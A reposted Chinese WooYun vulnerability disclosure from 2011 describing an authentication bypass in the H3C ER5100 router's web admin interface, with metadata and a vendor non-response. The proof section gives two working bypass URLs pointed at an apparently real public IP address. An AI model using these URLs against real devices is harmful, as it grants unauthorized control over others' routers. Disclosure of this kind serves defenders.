发新话题
打印

H3C ER5100 企业级双核宽带路由器 web管理页面存在验证漏洞

H3C ER5100 企业级双核宽带路由器 web管理页面存在验证漏洞

漏洞概要
缺陷编号:        WooYun-2011-02268
漏洞标题:        H3C ER5100 企业级双核宽带路由器 web管理页面存在验证漏洞
相关厂商:        华三通信技术有限公司
漏洞作者:        128bit
提交时间:        2011-06-17 09:59
公开时间:        2011-06-17 10:27
漏洞类型:        权限控制绕过
危害等级:        高
自评Rank:        15
漏洞状态:        未联系到厂商或者厂商积极忽略
漏洞来源:        http://www.wooyun.org
Tags标签:       认证缺陷 认证设计不合理 认证绕过 路由器安全

漏洞详情披露状态:
2011-06-17:        积极联系厂商并且等待厂商认领中,细节不对外公开
2011-06-17:        厂商已经主动忽略漏洞,细节向公众公开

简要描述:H3C ER5100 企业级宽带路由器web管理页面存在验证漏洞,未经授权的访问者可以修改、重启,查看大部分系统配置。
详细说明:
漏洞证明:





http://222.223.5.218:8080/home.asp?userLogin.asp

http://222.223.5.218:8080/wan_NAT.asp?userLogin.asp




修复方案:
版权声明:转载请注明来源 128bit@乌云
漏洞回应
厂商回应:未能联系到厂商或者厂商积极拒绝
漏洞Rank:20 (WooYun评价)

原文:http://www.wooyun.org/bugs/wooyun-2010-02268

TOP

发新话题